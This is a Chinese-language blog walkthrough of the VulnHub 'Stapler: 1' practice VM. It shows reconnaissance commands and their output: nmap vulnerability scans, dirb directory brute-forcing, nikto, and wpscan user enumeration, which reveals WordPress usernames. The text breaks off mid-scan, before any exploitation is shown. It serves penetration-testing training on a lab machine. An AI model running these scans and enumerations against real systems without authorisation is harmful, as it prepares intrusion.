vulnhub靶机渗透[Stapler-1]

Posted on 2020-04-13 Edited on 2020-08-17 In vulnhub walkthrough Views: Word count in article: 6k Reading time ≈ 22 mins.

名称

名称：Stapler: 1
发布日期：2016年6月8日

下载

Stapler.zip

Download (Mirror): https://download.vulnhub.com/stapler/Stapler.zip
Download (Torrent): https://download.vulnhub.com/stapler/Stapler.zip.torrent

描述

+---------------------------------------------------------+
|                                                         |
|                                  __..--''\              |
|                          __..--''         \             |
|                  __..--''          __..--''             |
|          __..--''          __..--''       |             |
|          \ o        __..--''____....----""              |
|           \__..--''\                                    |
|           |         \                                   |
|          +----------------------------------+           |
|          +----------------------------------+           |
|                                                         |
+- - - - - - - - - - - - - -|- - - - - - - - - - - - - - -+
|   名称: Stapler           |          IP: DHCP           |
|   日期: 2016-June-08      |        目标: Get Root!      |
|   作者: g0tmi1k           |        难度: ??? ;)         |
+- - - - - - - - - - - - - -|- - - - - - - - - - - - - - -+
|                                                         |
| + 一般的初级/中级虚拟机，只有几个拐点                      |
|   + 可能会觉得容易/困难(取决于你的水平)                    |
|   + ...还有攻击box的方式                                 |
|                                                         |
| + 它应该在VMware和Virtualbox上都能工作                    |
|   + 如果更改了网络模式，请重新启动VM                       |
|   + Fusion用户，需要在导入时重试                          |
|                                                         |
| + 有多种方法来执行此机器                                  |
|   + 至少有两(2)条路径可以得到有限制的shell                 |
|   + 至少有三种方法可以获得root访问权                       |
|                                                         |
| + 为2016年伦敦BsidesLondon定制                           |
|   + Slides: https://download.vulnhub.com/media/stapler/ |
|                                                         |
| + Thanks g0tmi1k, nullmode, rasta_mouse & superkojiman  |
|   + …向VulnHub-CTF团队大喊一声=)        |
|                                                         |
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - -+
|                                                         |
|       --[[~~Enjoy. Have fun. Happy Hacking.~~]]--       |
|                                                         |
+---------------------------------------------------------+

信息收集

上nmap

root@kali:~# nmap -sn -v 192.168.56.*
Nmap scan report for 192.168.56.122
Host is up (0.00013s latency).
MAC Address: 08:00:27:03:5A:E4 (Oracle VirtualBox virtual NIC)

root@kali:~# nmap -sV -v -p- 192.168.56.122
PORT      STATE  SERVICE     VERSION
20/tcp    closed ftp-data
21/tcp    open   ftp         vsftpd 2.0.8 or later
22/tcp    open   ssh         OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
53/tcp    open   domain      dnsmasq 2.75
80/tcp    open   http        PHP cli server 5.5 or later
123/tcp   closed ntp
137/tcp   closed netbios-ns
138/tcp   closed netbios-dgm
139/tcp   open   netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
666/tcp   open   doom?
3306/tcp  open   mysql       MySQL 5.7.12-0ubuntu1
12380/tcp open   http        Apache httpd 2.4.18 ((Ubuntu))

root@kali:~# nmap -A -T4 -v --script=vuln -p 21,22,53,80,139,666,3306,12380 192.168.56.122
PORT      STATE SERVICE     VERSION
21/tcp    open  ftp         vsftpd 2.0.8 or later
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_sslv2-drown: 
22/tcp    open  ssh         OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
53/tcp    open  domain      dnsmasq 2.75
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
80/tcp    open  http        PHP cli server 5.5 or later
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-slowloris-check: 
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|       
|     Disclosure date: 2009-09-17
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_      http://ha.ckers.org/slowloris/
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
139/tcp   open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
666/tcp   open  doom?
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| fingerprint-strings: 
|   NULL: 
|     message2.jpgUT 
|     QWux
|     "DL[E
|     #;3[
|     \xf6
|     u([r
|     qYQq
|     Y_?n2
|     3&M~{
|     9-a)T
|     L}AJ
|_    .npy.9
3306/tcp  open  mysql       MySQL 5.7.12-0ubuntu1
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
12380/tcp open  http        Apache httpd 2.4.18 ((Ubuntu))
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-server-header: Apache/2.4.18 (Ubuntu)
| http-slowloris-check: 
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|       
|     Disclosure date: 2009-09-17
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_      http://ha.ckers.org/slowloris/
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.10 - 4.11, Linux 3.2 - 4.9, Linux 4.4
Uptime guess: 0.016 days (since Mon Apr 13 03:19:38 2020)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=259 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: Host: RED; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| smb-vuln-cve2009-3103: 
|   VULNERABLE:
|   SMBv2 exploit (CVE-2009-3103, Microsoft Security Advisory 975497)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2009-3103
|           Array index error in the SMBv2 protocol implementation in srv2.sys in Microsoft Windows Vista Gold, SP1, and SP2,
|           Windows Server 2008 Gold and SP2, and Windows 7 RC allows remote attackers to execute arbitrary code or cause a
|           denial of service (system crash) via an & (ampersand) character in a Process ID High header field in a NEGOTIATE
|           PROTOCOL REQUEST packet, which triggers an attempted dereference of an out-of-bounds memory location,
|           aka "SMBv2 Negotiation Vulnerability."
|           
|     Disclosure date: 2009-09-08
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103
|_      http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: false
| smb-vuln-regsvc-dos: 
|   VULNERABLE:
|   Service regsvc in Microsoft Windows systems vulnerable to denial of service
|     State: VULNERABLE
|       The service regsvc in Microsoft Windows 2000 systems is vulnerable to denial of service caused by a null deference
|       pointer. This script will crash the service if it is vulnerable. This vulnerability was discovered by Ron Bowes
|       while working on smb-enum-sessions.
|_

dirb扫一波12380端口的目录

root@kali:~# dirb https://192.168.56.122:12380/

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Mon Apr 13 22:11:33 2020
URL_BASE: https://192.168.56.122:12380/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: https://192.168.56.122:12380/ ----
==> DIRECTORY: https://192.168.56.122:12380/announcements/                                                                
+ https://192.168.56.122:12380/index.html (CODE:200|SIZE:21)                                                              
==> DIRECTORY: https://192.168.56.122:12380/javascript/                                                                   
==> DIRECTORY: https://192.168.56.122:12380/phpmyadmin/                                                                   
+ https://192.168.56.122:12380/robots.txt (CODE:200|SIZE:59)                                                              
+ https://192.168.56.122:12380/server-status (CODE:403|SIZE:305)                                                          
                                                                                                                          
---- Entering directory: https://192.168.56.122:12380/announcements/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                          
---- Entering directory: https://192.168.56.122:12380/javascript/ ----
==> DIRECTORY: https://192.168.56.122:12380/javascript/jquery/                                                            
                                                                                                                          
---- Entering directory: https://192.168.56.122:12380/phpmyadmin/ ----
==> DIRECTORY: https://192.168.56.122:12380/phpmyadmin/doc/                                                               
+ https://192.168.56.122:12380/phpmyadmin/favicon.ico (CODE:200|SIZE:22486)                                               
+ https://192.168.56.122:12380/phpmyadmin/index.php (CODE:200|SIZE:10332)                                                 
==> DIRECTORY: https://192.168.56.122:12380/phpmyadmin/js/                                                                
+ https://192.168.56.122:12380/phpmyadmin/libraries (CODE:403|SIZE:312)                                                   
==> DIRECTORY: https://192.168.56.122:12380/phpmyadmin/locale/                                                            
+ https://192.168.56.122:12380/phpmyadmin/phpinfo.php (CODE:200|SIZE:10334)                                               
+ https://192.168.56.122:12380/phpmyadmin/setup (CODE:401|SIZE:464)                                                       
==> DIRECTORY: https://192.168.56.122:12380/phpmyadmin/sql/                                                               
==> DIRECTORY: https://192.168.56.122:12380/phpmyadmin/templates/                                                         
==> DIRECTORY: https://192.168.56.122:12380/phpmyadmin/themes/                                                            
                                                                                                                          
---- Entering directory: https://192.168.56.122:12380/javascript/jquery/ ----
+ https://192.168.56.122:12380/javascript/jquery/jquery (CODE:200|SIZE:284394)                                            
                                                                                                                          
---- Entering directory: https://192.168.56.122:12380/phpmyadmin/doc/ ----
==> DIRECTORY: https://192.168.56.122:12380/phpmyadmin/doc/html/                                                          
                                                                                                                          
---- Entering directory: https://192.168.56.122:12380/phpmyadmin/js/ ----
==> DIRECTORY: https://192.168.56.122:12380/phpmyadmin/js/jquery/                                                         
==> DIRECTORY: https://192.168.56.122:12380/phpmyadmin/js/transformations/                                                
                                                                                                                          
---- Entering directory: https://192.168.56.122:12380/phpmyadmin/locale/ ----
==> DIRECTORY: https://192.168.56.122:12380/phpmyadmin/locale/az/                                                         
==> DIRECTORY: https://192.168.56.122:12380/phpmyadmin/locale/bg/                                                         
==> DIRECTORY: https://192.168.56.122:12380/phpmyadmin/locale/ca/                                                         
==> DIRECTORY: https://192.168.56.122:12380/phpmyadmin/locale/cs/                                                         
==> DIRECTORY: https://192.168.56.122:12380/phpmyadmin/locale/da/                                                         
==> DIRECTORY: https://192.168.56.122:12380/phpmyadmin/locale/de/                                                         
==> DIRECTORY: https://192.168.56.122:12380/phpmyadmin/locale/el/                                                         
==> DIRECTORY: https://192.168.56.122:12380/phpmyadmin/locale/es/                                                         
==> DIRECTORY: https://192.168.56.122:12380/phpmyadmin/locale/et/                                                         
==> DIRECTORY: https://192.168.56.122:12380/phpmyadmin/locale/fi/                                                         
==> DIRECTORY: https://192.168.56.122:12380/phpmyadmin/locale/fr/                                                         
==> DIRECTORY: https://192.168.56.122:12380/phpmyadmin/locale/gl/                                                         
==> DIRECTORY: https://192.168.56.122:12380/phpmyadmin/locale/hu/                                                         
==> DIRECTORY: https://192.168.56.122:12380/phpmyadmin/locale/ia/                                                         
==> DIRECTORY: https://192.168.56.122:12380/phpmyadmin/locale/id/                                                         
==> DIRECTORY: https://192.168.56.122:12380/phpmyadmin/locale/it/                                                         
==> DIRECTORY: https://192.168.56.122:12380/phpmyadmin/locale/ja/                                                         
==> DIRECTORY: https://192.168.56.122:12380/phpmyadmin/locale/ko/                                                         
==> DIRECTORY: https://192.168.56.122:12380/phpmyadmin/locale/lt/                                                         
==> DIRECTORY: https://192.168.56.122:12380/phpmyadmin/locale/nl/                                                         
==> DIRECTORY: https://192.168.56.122:12380/phpmyadmin/locale/pl/                                                         
==> DIRECTORY: https://192.168.56.122:12380/phpmyadmin/locale/pt/                                                         
==> DIRECTORY: https://192.168.56.122:12380/phpmyadmin/locale/pt_BR/                                                      
==> DIRECTORY: https://192.168.56.122:12380/phpmyadmin/locale/ro/                                                         
==> DIRECTORY: https://192.168.56.122:12380/phpmyadmin/locale/ru/                                                         
==> DIRECTORY: https://192.168.56.122:12380/phpmyadmin/locale/si/                                                         
==> DIRECTORY: https://192.168.56.122:12380/phpmyadmin/locale/sk/                                                         
==> DIRECTORY: https://192.168.56.122:12380/phpmyadmin/locale/sl/                                                         
==> DIRECTORY: https://192.168.56.122:12380/phpmyadmin/locale/sq/                                                         
==> DIRECTORY: https://192.168.56.122:12380/phpmyadmin/locale/sv/                                                         
==> DIRECTORY: https://192.168.56.122:12380/phpmyadmin/locale/tr/                                                         
==> DIRECTORY: https://192.168.56.122:12380/phpmyadmin/locale/uk/                                                         
==> DIRECTORY: https://192.168.56.122:12380/phpmyadmin/locale/vi/                                                         
==> DIRECTORY: https://192.168.56.122:12380/phpmyadmin/locale/zh_CN/                                                      
==> DIRECTORY: https://192.168.56.122:12380/phpmyadmin/locale/zh_TW/                                                      
                                                                                                                          
---- Entering directory: https://192.168.56.122:12380/phpmyadmin/sql/ ----
                                                                                                                          
---- Entering directory: https://192.168.56.122:12380/phpmyadmin/templates/ ----
==> DIRECTORY: https://192.168.56.122:12380/phpmyadmin/templates/components/                                              
==> DIRECTORY: https://192.168.56.122:12380/phpmyadmin/templates/database/                                                
==> DIRECTORY: https://192.168.56.122:12380/phpmyadmin/templates/error/                                                   
==> DIRECTORY: https://192.168.56.122:12380/phpmyadmin/templates/javascript/                                              
==> DIRECTORY: https://192.168.56.122:12380/phpmyadmin/templates/list/                                                    
==> DIRECTORY: https://192.168.56.122:12380/phpmyadmin/templates/navigation/                                              
==> DIRECTORY: https://192.168.56.122:12380/phpmyadmin/templates/table/                                                   
==> DIRECTORY: https://192.168.56.122:12380/phpmyadmin/templates/test/                                                    
                                                                                                                          
---- Entering directory: https://192.168.56.122:12380/phpmyadmin/themes/ ----
==> DIRECTORY: https://192.168.56.122:12380/phpmyadmin/themes/original/                                                   
                                                                                                                          
---- Entering directory: https://192.168.56.122:12380/phpmyadmin/doc/html/ ----
+ https://192.168.56.122:12380/phpmyadmin/doc/html/index.html (CODE:200|SIZE:12811)                                       
                                                                                                                          
---- Entering directory: https://192.168.56.122:12380/phpmyadmin/js/jquery/ ----
                                                                                                                          
---- Entering directory: https://192.168.56.122:12380/phpmyadmin/js/transformations/ ----
                                                                                                                          
---- Entering directory: https://192.168.56.122:12380/phpmyadmin/locale/az/ ----
                                                                                                                          
---- Entering directory: https://192.168.56.122:12380/phpmyadmin/locale/bg/ ----
                                                                                                                          
---- Entering directory: https://192.168.56.122:12380/phpmyadmin/locale/ca/ ----
                                                                                                                          
---- Entering directory: https://192.168.56.122:12380/phpmyadmin/locale/cs/ ----
                                                                                                                          
---- Entering directory: https://192.168.56.122:12380/phpmyadmin/locale/da/ ----
                                                                                                                          
---- Entering directory: https://192.168.56.122:12380/phpmyadmin/locale/de/ ----
                                                                                                                          
---- Entering directory: https://192.168.56.122:12380/phpmyadmin/locale/el/ ----
                                                                                                                          
---- Entering directory: https://192.168.56.122:12380/phpmyadmin/locale/es/ ----
                                                                                                                          
---- Entering directory: https://192.168.56.122:12380/phpmyadmin/locale/et/ ----
                                                                                                                          
---- Entering directory: https://192.168.56.122:12380/phpmyadmin/locale/fi/ ----
                                                                                                                          
---- Entering directory: https://192.168.56.122:12380/phpmyadmin/locale/fr/ ----
                                                                                                                          
---- Entering directory: https://192.168.56.122:12380/phpmyadmin/locale/gl/ ----
                                                                                                                          
---- Entering directory: https://192.168.56.122:12380/phpmyadmin/locale/hu/ ----
                                                                                                                          
---- Entering directory: https://192.168.56.122:12380/phpmyadmin/locale/ia/ ----
                                                                                                                          
---- Entering directory: https://192.168.56.122:12380/phpmyadmin/locale/id/ ----
                                                                                                                          
---- Entering directory: https://192.168.56.122:12380/phpmyadmin/locale/it/ ----
                                                                                                                          
---- Entering directory: https://192.168.56.122:12380/phpmyadmin/locale/ja/ ----
                                                                                                                          
---- Entering directory: https://192.168.56.122:12380/phpmyadmin/locale/ko/ ----
                                                                                                                          
---- Entering directory: https://192.168.56.122:12380/phpmyadmin/locale/lt/ ----
                                                                                                                          
---- Entering directory: https://192.168.56.122:12380/phpmyadmin/locale/nl/ ----
                                                                                                                          
---- Entering directory: https://192.168.56.122:12380/phpmyadmin/locale/pl/ ----
                                                                                                                          
---- Entering directory: https://192.168.56.122:12380/phpmyadmin/locale/pt/ ----
                                                                                                                          
---- Entering directory: https://192.168.56.122:12380/phpmyadmin/locale/pt_BR/ ----
                                                                                                                          
---- Entering directory: https://192.168.56.122:12380/phpmyadmin/locale/ro/ ----
                                                                                                                          
---- Entering directory: https://192.168.56.122:12380/phpmyadmin/locale/ru/ ----
                                                                                                                          
---- Entering directory: https://192.168.56.122:12380/phpmyadmin/locale/si/ ----
                                                                                                                          
---- Entering directory: https://192.168.56.122:12380/phpmyadmin/locale/sk/ ----
                                                                                                                          
---- Entering directory: https://192.168.56.122:12380/phpmyadmin/locale/sl/ ----
                                                                                                                          
---- Entering directory: https://192.168.56.122:12380/phpmyadmin/locale/sq/ ----
                                                                                                                          
---- Entering directory: https://192.168.56.122:12380/phpmyadmin/locale/sv/ ----
                                                                                                                          
---- Entering directory: https://192.168.56.122:12380/phpmyadmin/locale/tr/ ----
                                                                                                                          
---- Entering directory: https://192.168.56.122:12380/phpmyadmin/locale/uk/ ----
                                                                                                                          
---- Entering directory: https://192.168.56.122:12380/phpmyadmin/locale/vi/ ----
                                                                                                                          
---- Entering directory: https://192.168.56.122:12380/phpmyadmin/locale/zh_CN/ ----
                                                                                                                          
---- Entering directory: https://192.168.56.122:12380/phpmyadmin/locale/zh_TW/ ----
                                                                                                                          
---- Entering directory: https://192.168.56.122:12380/phpmyadmin/templates/components/ ----
                                                                                                                          
---- Entering directory: https://192.168.56.122:12380/phpmyadmin/templates/database/ ----
                                                                                                                          
---- Entering directory: https://192.168.56.122:12380/phpmyadmin/templates/error/ ----
                                                                                                                          
---- Entering directory: https://192.168.56.122:12380/phpmyadmin/templates/javascript/ ----
                                                                                                                          
---- Entering directory: https://192.168.56.122:12380/phpmyadmin/templates/list/ ----
                                                                                                                          
---- Entering directory: https://192.168.56.122:12380/phpmyadmin/templates/navigation/ ----
                                                                                                                          
---- Entering directory: https://192.168.56.122:12380/phpmyadmin/templates/table/ ----
==> DIRECTORY: https://192.168.56.122:12380/phpmyadmin/templates/table/chart/                                             
==> DIRECTORY: https://192.168.56.122:12380/phpmyadmin/templates/table/search/                                            
                                                                                                                          
---- Entering directory: https://192.168.56.122:12380/phpmyadmin/templates/test/ ----
                                                                                                                          
---- Entering directory: https://192.168.56.122:12380/phpmyadmin/themes/original/ ----
==> DIRECTORY: https://192.168.56.122:12380/phpmyadmin/themes/original/css/                                               
==> DIRECTORY: https://192.168.56.122:12380/phpmyadmin/themes/original/img/                                               
==> DIRECTORY: https://192.168.56.122:12380/phpmyadmin/themes/original/jquery/                                            
                                                                                                                          
---- Entering directory: https://192.168.56.122:12380/phpmyadmin/templates/table/chart/ ----
                                                                                                                          
---- Entering directory: https://192.168.56.122:12380/phpmyadmin/templates/table/search/ ----
                                                                                                                          
---- Entering directory: https://192.168.56.122:12380/phpmyadmin/themes/original/css/ ----
                                                                                                                          
---- Entering directory: https://192.168.56.122:12380/phpmyadmin/themes/original/img/ ----
                                                                                                                          
---- Entering directory: https://192.168.56.122:12380/phpmyadmin/themes/original/jquery/ ----
==> DIRECTORY: https://192.168.56.122:12380/phpmyadmin/themes/original/jquery/images/                                     
                                                                                                                          
---- Entering directory: https://192.168.56.122:12380/phpmyadmin/themes/original/jquery/images/ ----
                                                                               ges/zt                                     
-----------------
END_TIME: Mon Apr 13 22:15:55 2020
DOWNLOADED: 290556 - FOUND: 10

上nikto

root@kali:~# nikto -host http://192.168.56.122:12380/
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.56.122
+ Target Hostname:    192.168.56.122
+ Target Port:        12380
---------------------------------------------------------------------------
+ SSL Info:        Subject:  /C=UK/ST=Somewhere in the middle of nowhere/L=Really, what are you meant to put here?/O=Initech/OU=Pam: I give up. no idea what to put here./CN=Red.Initech/emailAddress=pam@red.localhost
                   Ciphers:  ECDHE-RSA-AES256-GCM-SHA384
                   Issuer:   /C=UK/ST=Somewhere in the middle of nowhere/L=Really, what are you meant to put here?/O=Initech/OU=Pam: I give up. no idea what to put here./CN=Red.Initech/emailAddress=pam@red.localhost
+ Start Time:         2020-04-13 21:55:57 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'dave' found, with contents: Soemthing doesn't look right here
+ The site uses SSL and the Strict-Transport-Security HTTP header is not defined.
+ The site uses SSL and Expect-CT header is not present.
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Entry '/admin112233/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/blogblog/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 2 entries which should be manually viewed.
+ Hostname '192.168.56.122' does not match certificate's names: Red.Initech
+ Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: OPTIONS, GET, HEAD, POST 
+ Uncommon header 'x-ob_mode' found, with contents: 1
+ OSVDB-3233: /icons/README: Apache default file found.
+ /phpmyadmin/: phpMyAdmin directory found
+ 8071 requests: 0 error(s) and 15 item(s) reported on remote host
+ End Time:           2020-04-13 21:58:35 (GMT-4) (158 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

wpscan扫一下https://192.168.56.122:12380/blogblog/

root@kali:~# wpscan --disable-tls-checks --url https://192.168.56.122:12380/blogblog/ --enumerate u
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.7.11
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]
[+] URL: https://192.168.56.122:12380/blogblog/ [192.168.56.122]
[+] Started: Mon Apr 13 22:26:43 2020

Interesting Finding(s):

[+] Headers
 | Interesting Entries:
 |  - Server: Apache/2.4.18 (Ubuntu)
 |  - Dave: Soemthing doesn't look right here
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: https://192.168.56.122:12380/blogblog/xmlrpc.php
 | Found By: Headers (Passive Detection)
 | Confidence: 100%
 | Confirmed By:
 |  - Link Tag (Passive Detection), 30% confidence
 |  - Direct Access (Aggressive Detection), 100% confidence
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access

[+] https://192.168.56.122:12380/blogblog/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Registration is enabled: https://192.168.56.122:12380/blogblog/wp-login.php?action=register
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: https://192.168.56.122:12380/blogblog/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: https://192.168.56.122:12380/blogblog/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 4.2.1 identified (Insecure, released on 2015-04-27).
 | Found By: Rss Generator (Passive Detection)
 |  - https://192.168.56.122:12380/blogblog/?feed=rss2, <generator>http://wordpress.org/?v=4.2.1</generator>
 |  - https://192.168.56.122:12380/blogblog/?feed=comments-rss2, <generator>http://wordpress.org/?v=4.2.1</generator>

[+] WordPress theme in use: bhost
 | Location: https://192.168.56.122:12380/blogblog/wp-content/themes/bhost/
 | Last Updated: 2019-12-08T00:00:00.000Z
 | Readme: https://192.168.56.122:12380/blogblog/wp-content/themes/bhost/readme.txt
 | [!] The version is out of date, the latest version is 1.4.4
 | Style URL: https://192.168.56.122:12380/blogblog/wp-content/themes/bhost/style.css?ver=4.2.1
 | Style Name: BHost
 | Description: Bhost is a nice , clean , beautifull, Responsive and modern design free WordPress Theme. This theme ...
 | Author: Masum Billah
 | Author URI: http://getmasum.net/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 1.2.9 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - https://192.168.56.122:12380/blogblog/wp-content/themes/bhost/style.css?ver=4.2.1, Match: 'Version: 1.2.9'

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:00 <=============================================> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] John Smith
 | Found By: Author Posts - Display Name (Passive Detection)
 | Confirmed By: Rss Generator (Passive Detection)

[+] barry
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] john
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] elly
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] garry
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] peter
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] heather
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] harry
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] scott
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] kathy
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] tim
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[!] No WPVulnDB API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 50 daily requests by registering at https://wpvulndb.com/users/sign_up

[+] Finished: Mon Apr 13 22:26:48 2020
[+] Requests Done: 69
[+] Cached Requests: 6
[+] Data Sent: 17.953 KB
[+] Data Received: 294.119 KB
[+] Memory used: 109.172 MB
[+] Elapsed time: 00:00:05

root@kali:~# wpscan --disable-tls-checks --url https://192.168.56.122:12380/blogblog/ --enumerate p
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.7.11
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N][+] URL: https://192.168.56.122:12380/blogblog/ [192.168.56.122]
[+] Started: Mon Apr 13 22:31:13 2020

Interesting Finding(s):

[+] Headers
 | Interesting Entries:
 |  - Server: Apache/2.4.18 (Ubuntu)
 |  - Dave: Soemthing doesn't look right here
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: https://192.168.56.122:12380/blogblog/xmlrpc.php
 | Found By: Headers (Passive Detection)
 | Confidence: 100%
 | Confirmed By:
 |  - Link Tag (Passive Detection), 30% confidence
 |  - Direct Access (Aggressive Detection), 100% confidence
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access

[+] https://192.168.56.122:12380/blogblog/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Registration is enabled: https://192.168.56.122:12380/blogblog/wp-login.php?action=register
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: https://192.168.56.122:12380/blogblog/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: https://192.168.56.122:12380/blogblog/wp-cron.php
